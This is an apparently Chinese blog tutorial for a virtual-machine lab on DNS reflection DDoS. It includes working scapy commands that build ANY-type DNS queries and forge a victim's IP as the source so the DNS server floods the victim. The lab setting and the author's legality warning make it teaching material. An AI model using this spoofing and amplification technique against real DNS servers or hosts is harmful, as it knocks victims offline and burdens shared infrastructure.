• 利用dns协议发起ddos反射攻击


    利用DNS服务器发起反射型DDOS,攻击带宽

    基本思路:
    1、利用any类型的dns查询,可完成发送少量请求数据,获得大量返回数据。
    2、将原请求地址改为受害者地址,则dns会向受害者返回大量数据,占用带宽

    警告!

    利用公共dns的攻击行为会影响dns的性能,请谨慎使用,一旦大规模占用dns资源会造成dns拥堵,属于违法犯罪行为。

    实验步骤:

    1、验证服务器是否可正常工作

    查看网关。(Nat模式下,所有虚拟机都是在主机下的子网里,默认dns服务器地址即为网关地址)
    命令:route -n
    在这里插入图片描述

    (2)登录攻击机,使用dig查询dns
    命令为:dig host地址 @dns服务器地址

    在这里插入图片描述

    确认DNS服务器可用

    2、抓取any查询的数据包

    使用攻击机抓取数据包
    在这里插入图片描述

    使用攻击机开始dig查询
    在这里插入图片描述

    停止抓包
    Pkill tcpdump

    在这里插入图片描述

    3、使用scapy分析数据包

    打开scapy,读取数据包

    在这里插入图片描述

    Pcap=rdpcap(“dns.pcap”)		#读文件
    Pcap[3]					#获取第4条数据,前三条为三次握手,第四条才是dns请求。
    
    • 1
    • 2

    查看数据包结构

    ls(DNS)
    ls(DNSQR)
    
    • 1
    • 2

    我截图上下标为14是因为我之前还发过其他的请求数据,不用管它

    构造数据包:

     i=IP(src="192.168.237.128",dst="192.168.237.2")
     u=UDP()
     q=DNSQR(qname="baidu.com",qtype=255)
     d=DNS(rd=1,qdcount=1,qd=q)
     r=(i/u/d)
    sr1(r)
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6

    在这里插入图片描述
    在这里插入图片描述

    确认可以成功发包。

    4、使用靶机抓包

    靶机打开wireshark,开启抓包。

    5、使用攻击机伪造IP源,发起攻击

    i=IP(src="192.168.237.132",dst="192.168.237.2")
    r=(i/u/d)
    sr1(r)
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    6、观察靶机,可以看到确实接收到了DNS服务器发来的数据包。

    在这里插入图片描述

  • 相关阅读:
    docker-私有仓库Harbor-个人网盘
    基于Spring Boot的网上购物商城系统
    Elasticsearch内存分析
    计算机网络 -- 多人聊天室
    Java项目:在线健身房管理系统(java+SpringBoot+JSP+HTML+maven+mysql)
    [qemu逃逸] DefconQuals2018-EC3
    常见的缓存淘汰算法
    kubernetes API Server 看这篇试试
    模型的选择与调优(网格搜索与交叉验证)
    vue3全屏功能实现
  • 原文地址:https://blog.csdn.net/my_name_is_sy/article/details/134000911